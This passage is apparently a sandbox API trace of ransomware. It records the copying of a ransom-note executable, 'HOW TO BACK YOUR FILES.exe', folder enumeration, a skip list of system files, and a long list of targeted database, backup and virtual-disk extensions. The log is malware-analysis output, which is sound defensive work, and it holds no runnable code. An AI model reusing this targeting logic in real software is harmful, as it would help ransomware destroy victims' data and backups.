[0085.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0085.679] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE") returned 35 [0085.679] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\OFFICE" | out: lpString1="C:\\Users\\All Users\\Microsoft\\OFFICE") returned="C:\\Users\\All Users\\Microsoft\\OFFICE" [0085.679] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0085.679] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\office\\how to back your files.exe"), bFailIfExists=1) returned 0 [0085.680] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.680] GetLastError () returned 0x0 [0085.680] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0085.680] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0085.680] CloseHandle (hObject=0x120) returned 1 [0085.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0085.680] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0085.680] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5e97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0085.681] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.681] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0085.681] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.681] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5e97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.681] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.681] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0085.681] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.681] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.681] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5011dd00, ftLastWriteTime.dwHighDateTime=0x1ca04ff, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AssetLibrary.ico", cAlternateFileName="ASSETL~1.ICO")) returned 1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="aoldtz.exe") returned 1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2=".") returned 1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="..") returned 1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="windows") returned -1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="bootmgr") returned -1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="temp") returned -1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="pagefile.sys") returned -1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="boot") returned -1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="ids.txt") returned -1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="ntuser.dat") returned -1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="perflogs") returned -1 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="MSBuild") returned -1 [0085.681] lstrlenW (lpString="AssetLibrary.ico") returned 16 [0085.681] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\*") returned 37 [0085.681] lstrcpyW (in: lpString1=0x2cce448, lpString2="AssetLibrary.ico" | out: lpString1="AssetLibrary.ico") returned="AssetLibrary.ico" [0085.681] lstrlenW (lpString="AssetLibrary.ico") returned 16 [0085.681] lstrlenW (lpString="Ares865") returned 7 [0085.681] lstrcmpiW (lpString1="ary.ico", lpString2="Ares865") returned 1 [0085.681] lstrlenW (lpString=".dll") returned 4 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2=".dll") returned 1 [0085.681] lstrlenW (lpString=".lnk") returned 4 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2=".lnk") returned 1 [0085.681] lstrlenW (lpString=".ini") returned 4 [0085.681] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2=".ini") returned 1 [0085.682] lstrlenW (lpString=".sys") returned 4 [0085.682] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2=".sys") returned 1 [0085.682] lstrlenW (lpString="AssetLibrary.ico") returned 16 [0085.682] lstrlenW (lpString="bak") returned 3 [0085.682] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0085.682] lstrlenW (lpString="ba_") returned 3 [0085.682] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0085.682] lstrlenW (lpString="dbb") returned 3 [0085.682] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0085.682] lstrlenW (lpString="vmdk") returned 4 [0085.682] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0085.682] lstrlenW (lpString="rar") returned 3 [0085.682] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0085.682] lstrlenW (lpString="zip") returned 3 [0085.682] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0085.682] lstrlenW (lpString="tgz") returned 3 [0085.682] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0085.682] lstrlenW (lpString="vbox") returned 4 [0085.682] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0085.682] lstrlenW (lpString="vdi") returned 3 [0085.682] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0085.682] lstrlenW (lpString="vhd") returned 3 [0085.682] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0085.682] lstrlenW (lpString="vhdx") returned 4 [0085.682] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0085.682] lstrlenW (lpString="avhd") returned 4 [0085.682] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0085.682] lstrlenW (lpString="db") returned 2 [0085.682] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0085.682] lstrlenW (lpString="db2") returned 3 [0085.682] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0085.682] lstrlenW (lpString="db3") returned 3 [0085.682] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0085.682] lstrlenW (lpString="dbf") returned 3 [0085.682] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0085.682] lstrlenW (lpString="mdf") returned 3 [0085.682] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0085.682] lstrlenW (lpString="mdb") returned 3 [0085.683] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0085.683] lstrlenW (lpString="sql") returned 3 [0085.683] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0085.683] lstrlenW (lpString="sqlite") returned 6 [0085.683] lstrcmpiW (lpString1="ry.ico", lpString2="sqlite") returned -1 [0085.683] lstrlenW (lpString="sqlite3") returned 7 [0085.683] lstrcmpiW (lpString1="ary.ico", lpString2="sqlite3") returned -1 [0085.683] lstrlenW (lpString="sqlitedb") returned 8 [0085.683] lstrcmpiW (lpString1="rary.ico", lpString2="sqlitedb") returned -1 [0085.683] lstrlenW (lpString="xml") returned 3 [0085.683] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0085.683] lstrlenW (lpString="$er") returned 3 [0085.683] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0085.683] lstrlenW (lpString="4dd") returned 3 [0085.683] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0085.683] lstrlenW (lpString="4dl") returned 3 [0085.683] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0085.683] lstrlenW (lpString="^^^") returned 3 [0085.683] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0085.683] lstrlenW (lpString="abs") returned 3 [0085.683] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0085.683] lstrlenW (lpString="abx") returned 3 [0085.683] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0085.683] lstrlenW (lpString="accdb") returned 5 [0085.683] lstrcmpiW (lpString1="y.ico", lpString2="accdb") returned 1 [0085.683] lstrlenW (lpString="accdc") returned 5 [0085.683] lstrcmpiW (lpString1="y.ico", lpString2="accdc") returned 1 [0085.683] lstrlenW (lpString="accde") returned 5 [0085.683] lstrcmpiW (lpString1="y.ico", lpString2="accde") returned 1 [0085.683] lstrlenW (lpString="accdr") returned 5 [0085.683] lstrcmpiW (lpString1="y.ico", lpString2="accdr") returned 1 [0085.683] lstrlenW (lpString="accdt") returned 5 [0085.683] lstrcmpiW (lpString1="y.ico", lpString2="accdt") returned 1 [0085.683] lstrlenW (lpString="accdw") returned 5 [0085.683] lstrcmpiW (lpString1="y.ico", lpString2="accdw") returned 1 [0085.683] lstrlenW (lpString="accft") returned 5 [0085.683] lstrcmpiW (lpString1="y.ico", lpString2="accft") returned 1 [0085.683] lstrlenW (lpString="adb") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0085.684] lstrlenW (lpString="adb") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0085.684] lstrlenW (lpString="ade") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0085.684] lstrlenW (lpString="adf") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0085.684] lstrlenW (lpString="adn") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0085.684] lstrlenW (lpString="adp") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0085.684] lstrlenW (lpString="alf") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0085.684] lstrlenW (lpString="ask") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0085.684] lstrlenW (lpString="btr") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0085.684] lstrlenW (lpString="cat") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0085.684] lstrlenW (lpString="cdb") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0085.684] lstrlenW (lpString="ckp") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0085.684] lstrlenW (lpString="cma") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0085.684] lstrlenW (lpString="cpd") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0085.684] lstrlenW (lpString="dacpac") returned 6 [0085.684] lstrcmpiW (lpString1="ry.ico", lpString2="dacpac") returned 1 [0085.684] lstrlenW (lpString="dad") returned 3 [0085.684] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0085.684] lstrlenW (lpString="dadiagrams") returned 10 [0085.684] lstrcmpiW (lpString1="ibrary.ico", lpString2="dadiagrams") returned 1 [0085.684] lstrlenW (lpString="daschema") returned 8 [0085.684] lstrcmpiW (lpString1="rary.ico", lpString2="daschema") returned 1 [0085.684] lstrlenW (lpString="db-journal") returned 10 [0085.684] lstrcmpiW (lpString1="ibrary.ico", lpString2="db-journal") returned 1 [0085.684] lstrlenW (lpString="db-shm") returned 6 [0085.685] lstrcmpiW (lpString1="ry.ico", lpString2="db-shm") returned 1 [0085.685] lstrlenW (lpString="db-wal") returned 6 [0085.685] lstrcmpiW (lpString1="ry.ico", lpString2="db-wal") returned 1 [0085.685] lstrlenW (lpString="dbc") returned 3 [0085.685] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0085.685] lstrlenW (lpString="dbs") returned 3 [0085.685] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0085.685] lstrlenW (lpString="dbt") returned 3 [0085.685] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0085.685] lstrlenW (lpString="dbv") returned 3 [0085.685] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0085.685] lstrlenW (lpString="dbx") returned 3 [0085.685] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0085.685] lstrlenW (lpString="dcb") returned 3 [0085.685] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0085.685] lstrlenW (lpString="dct") returned 3 [0085.685] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0085.685] lstrlenW (lpString="dcx") returned 3 [0085.685] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0085.685] lstrlenW (lpString="ddl") returned 3 [0085.685] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0085.685] lstrlenW (lpString="dlis") returned 4 [0085.685] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0085.685] lstrlenW (lpString="dp1") returned 3 [0085.685] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0085.686] lstrlenW (lpString="dqy") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0085.686] lstrlenW (lpString="dsk") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0085.686] lstrlenW (lpString="dsn") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0085.686] lstrlenW (lpString="dtsx") returned 4 [0085.686] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0085.686] lstrlenW (lpString="dxl") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0085.686] lstrlenW (lpString="eco") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0085.686] lstrlenW (lpString="ecx") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0085.686] lstrlenW (lpString="edb") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0085.686] lstrlenW (lpString="epim") returned 4 [0085.686] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0085.686] lstrlenW (lpString="fcd") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0085.686] lstrlenW (lpString="fdb") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0085.686] lstrlenW (lpString="fic") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0085.686] lstrlenW (lpString="flexolibrary") returned 12 [0085.686] lstrcmpiW (lpString1="tLibrary.ico", lpString2="flexolibrary") returned 1 [0085.686] lstrlenW (lpString="fm5") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0085.686] lstrlenW (lpString="fmp") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0085.686] lstrlenW (lpString="fmp12") returned 5 [0085.686] lstrcmpiW (lpString1="y.ico", lpString2="fmp12") returned 1 [0085.686] lstrlenW (lpString="fmpsl") returned 5 [0085.686] lstrcmpiW (lpString1="y.ico", lpString2="fmpsl") returned 1 [0085.686] lstrlenW (lpString="fol") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0085.686] lstrlenW (lpString="fp3") returned 3 [0085.686] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0085.687] lstrlenW (lpString="fp4") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0085.687] lstrlenW (lpString="fp5") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0085.687] lstrlenW (lpString="fp7") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0085.687] lstrlenW (lpString="fpt") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0085.687] lstrlenW (lpString="frm") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0085.687] lstrlenW (lpString="gdb") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0085.687] lstrlenW (lpString="gdb") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0085.687] lstrlenW (lpString="grdb") returned 4 [0085.687] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0085.687] lstrlenW (lpString="gwi") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0085.687] lstrlenW (lpString="hdb") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0085.687] lstrlenW (lpString="his") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0085.687] lstrlenW (lpString="ib") returned 2 [0085.687] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0085.687] lstrlenW (lpString="idb") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0085.687] lstrlenW (lpString="ihx") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0085.687] lstrlenW (lpString="itdb") returned 4 [0085.687] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0085.687] lstrlenW (lpString="itw") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0085.687] lstrlenW (lpString="jet") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0085.687] lstrlenW (lpString="jtx") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0085.687] lstrlenW (lpString="kdb") returned 3 [0085.687] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0085.688] lstrlenW (lpString="kexi") returned 4 [0085.688] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0085.688] lstrlenW (lpString="kexic") returned 5 [0085.688] lstrcmpiW (lpString1="y.ico", lpString2="kexic") returned 1 [0085.688] lstrlenW (lpString="kexis") returned 5 [0085.688] lstrcmpiW (lpString1="y.ico", lpString2="kexis") returned 1 [0085.688] lstrlenW (lpString="lgc") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0085.688] lstrlenW (lpString="lwx") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0085.688] lstrlenW (lpString="maf") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0085.688] lstrlenW (lpString="maq") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0085.688] lstrlenW (lpString="mar") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0085.688] lstrlenW (lpString="marshal") returned 7 [0085.688] lstrcmpiW (lpString1="ary.ico", lpString2="marshal") returned -1 [0085.688] lstrlenW (lpString="mas") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0085.688] lstrlenW (lpString="mav") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0085.688] lstrlenW (lpString="maw") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0085.688] lstrlenW (lpString="mdbhtml") returned 7 [0085.688] lstrcmpiW (lpString1="ary.ico", lpString2="mdbhtml") returned -1 [0085.688] lstrlenW (lpString="mdn") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0085.688] lstrlenW (lpString="mdt") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0085.688] lstrlenW (lpString="mfd") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0085.688] lstrlenW (lpString="mpd") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0085.688] lstrlenW (lpString="mrg") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0085.688] lstrlenW (lpString="mud") returned 3 [0085.688] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0085.689] lstrlenW (lpString="mwb") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0085.689] lstrlenW (lpString="myd") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0085.689] lstrlenW (lpString="ndf") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0085.689] lstrlenW (lpString="nnt") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0085.689] lstrlenW (lpString="nrmlib") returned 6 [0085.689] lstrcmpiW (lpString1="ry.ico", lpString2="nrmlib") returned 1 [0085.689] lstrlenW (lpString="ns2") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0085.689] lstrlenW (lpString="ns3") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0085.689] lstrlenW (lpString="ns4") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0085.689] lstrlenW (lpString="nsf") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0085.689] lstrlenW (lpString="nv") returned 2 [0085.689] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0085.689] lstrlenW (lpString="nv2") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0085.689] lstrlenW (lpString="nwdb") returned 4 [0085.689] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0085.689] lstrlenW (lpString="nyf") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0085.689] lstrlenW (lpString="odb") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0085.689] lstrlenW (lpString="odb") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0085.689] lstrlenW (lpString="oqy") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0085.689] lstrlenW (lpString="ora") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0085.689] lstrlenW (lpString="orx") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0085.689] lstrlenW (lpString="owc") returned 3 [0085.689] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0085.690] lstrlenW (lpString="p96") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0085.690] lstrlenW (lpString="p97") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0085.690] lstrlenW (lpString="pan") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0085.690] lstrlenW (lpString="pdb") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0085.690] lstrlenW (lpString="pdm") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0085.690] lstrlenW (lpString="pnz") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0085.690] lstrlenW (lpString="qry") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0085.690] lstrlenW (lpString="qvd") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0085.690] lstrlenW (lpString="rbf") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0085.690] lstrlenW (lpString="rctd") returned 4 [0085.690] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0085.690] lstrlenW (lpString="rod") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0085.690] lstrlenW (lpString="rodx") returned 4 [0085.690] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0085.690] lstrlenW (lpString="rpd") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0085.690] lstrlenW (lpString="rsd") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0085.690] lstrlenW (lpString="sas7bdat") returned 8 [0085.690] lstrcmpiW (lpString1="rary.ico", lpString2="sas7bdat") returned -1 [0085.690] lstrlenW (lpString="sbf") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0085.690] lstrlenW (lpString="scx") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0085.690] lstrlenW (lpString="sdb") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0085.690] lstrlenW (lpString="sdc") returned 3 [0085.690] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0085.690] lstrlenW (lpString="sdf") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0085.691] lstrlenW (lpString="sis") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0085.691] lstrlenW (lpString="spq") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0085.691] lstrlenW (lpString="te") returned 2 [0085.691] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0085.691] lstrlenW (lpString="teacher") returned 7 [0085.691] lstrcmpiW (lpString1="ary.ico", lpString2="teacher") returned -1 [0085.691] lstrlenW (lpString="tmd") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0085.691] lstrlenW (lpString="tps") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0085.691] lstrlenW (lpString="trc") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0085.691] lstrlenW (lpString="trc") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0085.691] lstrlenW (lpString="trm") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0085.691] lstrlenW (lpString="udb") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0085.691] lstrlenW (lpString="udl") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0085.691] lstrlenW (lpString="usr") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0085.691] lstrlenW (lpString="v12") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0085.691] lstrlenW (lpString="vis") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0085.691] lstrlenW (lpString="vpd") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0085.691] lstrlenW (lpString="vvv") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0085.691] lstrlenW (lpString="wdb") returned 3 [0085.691] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0085.691] lstrlenW (lpString="wmdb") returned 4 [0085.691] lstrcmpiW (lpString1=".ico", lpString2="wmdb") 